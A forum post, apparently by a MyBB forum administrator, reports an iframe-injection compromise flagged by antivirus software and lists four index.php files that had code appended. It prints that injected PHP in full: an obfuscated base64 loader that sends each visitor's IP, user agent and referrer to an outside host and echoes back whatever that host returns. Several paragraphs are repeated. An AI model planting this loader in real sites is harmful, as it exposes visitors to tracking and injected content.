2011-10-17, 08:26 PM
so a few users have been complaining that norton was throwing alerts when they would login to the forum. one guy actually remembered to save the alert and post it up so I could see what it said and here's what we have:
"Web Attack: Mass Iframe Injection Attack 2; An intrusion attempt by myforumurl.com was blocked; Mon.,Oct 17, 8:42 AM; (IP address removed)."
anyhow, while running the file verification tool, I noticed that all of the index.php files within mybb had the following php code added to the very bottom of the file:
that code was added to the following files:
/index.php
/admin/index.php
/admin/modules/home/index.php
/archive/index.php
"Web Attack: Mass Iframe Injection Attack 2; An intrusion attempt by myforumurl.com was blocked; Mon.,Oct 17, 8:42 AM; (IP address removed)."
anyhow, while running the file verification tool, I noticed that all of the index.php files within mybb had the following php code added to the very bottom of the file:
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
that code was added to the following files:
/index.php
/admin/index.php
/admin/modules/home/index.php
/archive/index.php